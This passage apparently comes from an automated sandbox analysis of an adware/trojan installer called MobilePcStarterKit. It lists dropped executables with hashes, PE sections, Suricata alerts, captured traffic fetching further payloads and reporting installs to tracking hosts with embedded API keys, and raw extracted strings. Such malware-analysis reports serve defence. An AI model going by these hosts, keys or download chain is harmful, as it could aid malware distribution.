| c8617cf28dc614e787c6fb8a12833705 | c:\Program Files\mpck\mobilepcstarterkit_widget.exe |
| a8c6d6773a8a969da79dad5ae00b20d1 | c:\Program Files\mpck\unins000.exe |
| 9c2a9c265c01b3502b834dc5d0de391e | c:\Program Files\mpck\uninstaller.exe |
| 31f9595259b810b7e304683bfacb1bcc | c:\Program Files\mpck\wincom_FYV.exe |
| 845d20f846a554990ea363a54ece3f2e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe |
| 21ec42819703ce3521285f86503be44c | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\advise.exe |
| 2238415466ea09adc11052b8a6a08ce0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe |
| 845d20f846a554990ea363a54ece3f2e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe |
| 258ff5d6c1e46480098c67507b510c82 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe |
| 9486b846677ac228b40699239d7c1649 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\W15R20Q1Q1.exe |
| ec5244a037d33fb1a124772e7163c8d6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe |
| 2238415466ea09adc11052b8a6a08ce0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe |
| 561db5bc9c73bee3f7221f31f3d222e3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe |
| c59b15aa0a36c60f958bb33ef53f468c | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-SGBAU.tmp\0861e59c41bb5f407dacedf51edab54f.tmp |
| 92dc6ef532fbb4a5c3201469a5b5eb63 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\_isetup\_shfoldr.dll |
| 436a629d3b9eaf86461b2101aa2c2ad3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\idp.dll |
| c7ed2f4fbab0b46402629d448d5982ae | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\setup.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: MobilePcStarterKit
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: MobilePcStarterKit Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 40240 | 40448 | 4.59679 | c3bd95c4b1a8e5199981e0d9b45fd18c |
| DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
| BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
| .tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
| .reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 69632 | 10136 | 10240 | 2.96645 | f4b72ac60acd2d254588e8c3e9161878 |
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Signed TLS Certificate with md5WithRSAEncryption
ET MALWARE Adware-Win32/EoRezo Reporting
Traffic
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:18 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: weminternal.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:20 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /get/4/remote.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:06 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
HEAD /download/2/mobilepcstarterkit-installer.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.4
Host: download.cleanshot.host
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:42 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="mobilepcstarterkit-installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET /download/2/mobilepcstarterkit-installer.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.4
Host: download.cleanshot.host
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:42 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="mobilepcstarterkit-installer.exe"
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:22 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=e24fa498c5b92167716dc501e82a23f38ca06659; expires=Mon, 05-Dec-2016 19:57:22 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Conte
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:11 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=fa5768b2b058b321a40e789e4caa97b0c0203c12; expires=Mon, 05-Dec-2016 19:57:11 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=23706320fa80e2626e64f765e1b4e58febc54882; expires=Mon, 05-Dec-2016 19:57:13 GMT; Max-Age=7200; path=/; httponly
Content-Length: 59
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/wizzcaster.com\/redirect\/57a764d042bf8"}
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_
channel_name=1
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:14 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=i2pj18hj6ugnj4glu090t25cb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1580
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
GET /download/4/replaceUninstaller.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:57 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="replaceUninstaller.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: weminternal.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:50 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=3jhlmo4emmti9q6eqnrag0tpm4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_download_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:50 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=06adee0lg4fhg9cdron3q3ktd2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_download_succeed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:51 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=9p09irikoc706lktlqtnavnoo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzproduct_execute_succeed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:52 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=f3krk909qt8nkq9a7trn9empq4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_download_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:52 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=4slhcsagr1t34nbg293ukrblu2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_download_succeed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:53 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=1o9038ds6gc7bnjm99s8pip412; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_product_execute_succeed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:58 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=la88n5jd8ent88pmik3ce9hja4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzuninstaller_download_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:58 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ptg77gs5q0vju01ma19d7js214; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_wizzuninstaller_download_succeed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=aa049f5sbrff9cvj7ba5ehfmp7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_combroadcaster_download_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=mavpk44n4t017cie827d526bh6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_combroadcaster_execute_succeed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:04 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=rim5970ilgj3fjuh80flk2ac93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_done HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 48
Expect: 100-continue
HTTP/1.1 100 Continue
....
user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:05 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=110st6krvpd3e93g5nps830uu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
GET /download/2/wizzrelease.exe HTTP/1.1
Host: downloadmyhost.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:59 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzrelease.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=5836ca80e6d5d
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=c9708501f243adea810dba3778dc4c58d44d5589; expires=Mon, 05-Dec-2016 19:57:13 GMT; Max-Age=7200; path=/; httponly
Content-Length: 60
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/goodwebshow.com\/redirect\/5836ca80e6d5d"}
GET /download/2/wizzproduct.exe HTTP/1.1
Host: downloadmyhost.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:50 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzproduct.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /download/2/mobilepcstarterkit_widget.exe HTTP/1.1
Host: downloadmyhost.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:52 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="mobilepcstarterkit_widget.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /download/2/mobilepcstarterkit-uninstaller.exe HTTP/1.1
Host: downloadmyhost.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="mobilepcstarterkit-uninstaller.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /download/2/combroadcaster.exe HTTP/1.1
Host: downloadmyhost.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="combroadcaster.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /cgi-bin/advert/getkws.cgi?did=11793&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: tuto_monetize_120161205-2.00
Host: ads.adskyforever.com
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 88dcd395-b062-45b3-a6cd-79f37c0eba08
X-OS-Ver: 6.1.2.7601
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:14 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Mon, 31 Oct 2016 15:55:19 GMT
ETag: "39-5402b3c1b934e"
Accept-Ranges: bytes
Content-Length: 57
{"dids":{},"freeze":3600,"refresh":3600,"version":125714}
GET /download/4/replaceUninstaller.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:15 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="replaceUninstaller.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1
Host: weminternal.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:16 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/4/updater.exe HTTP/1.1
Host: weminternal.com
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:16 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:57:06 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.tutomonetize.com
Content-Length: 137
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
remote_id=3&user_name=tuto&api_key=dqsdsqf-azezae-azeaze-azeaze&buying_product_name=mpck&buying_partner_name=ref015&buying_channel_name=2
HTTP/1.1 200 OK
Date: Mon, 05 Dec 2016 17:56:56 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=313tli42tmj417v2f0nhvin7g7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1600
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
The Trojan connects to the servers at the following location(s):
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
comctl32.dll
ole32.dll
ShellExecuteExA
ShellExecuteA
comdlg32.dll
.text
`.rdata
@.data
.pdata
@.rsrc
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>`.data
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryW
RegOpenKeyA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s
Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance
Class %s not found
Resource %s not found!Resource %s is of incorrect class
List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates
Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name
A class named %s already exists#''%s'' is not a valid integer value
Error reading %s.%s: %s
Ancestor for '%s' not found
Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application
Could not load CARDS.DLL
Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Grid too large for operation Too many rows or columns deleted
%s on line %d
''%s'' expected
%s expected
Invalid input value7Invalid input value. Use escape key to abandon changes
Value must be between %d and %d<Cannot create a default method name for an unnamed component
''%s'' is not a valid date
''%s'' is not a valid time#''%s'' is not a valid date and time
Invalid file name - %s
All files (*.*)|*.*
&Files: (*.*)
Invalid clipboard format Clipboard does not support Icons
Custom Colors Operation not supported on selected printer.There is no default printer currently selected
Unable to write to %s
Invalid data type for '%s'
Failed to create key %s
Failed to set data for '%s'
Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)
/Menu '%s' is already being used by another form
Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s
Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.52.0.0
wincom_FYV.exe_192:
.text
`.rdata
@.data
.rsrc
@.reloc
Camellia for x86 by <appro@openssl.org>
AES for x86, CRYPTOGAMS by <appro@openssl.org>
RC4 for x86, CRYPTOGAMS by <appro@openssl.org>
SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
DlSHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
FtPS
CB_ColorKey
CB_Keydown
CB_Keyup
()$^.* ?[]|\-{},:=!CNotSupportedException
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CCmdTarget
RegDeleteKeyExW
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
operator
GetProcessWindowStation
portuguese-brazilian
F%D,3
dbghelp.dll
%Y-%m-%dT%H:%M:%SZ
Could not resolve %s: %s; %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
%s:%d
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
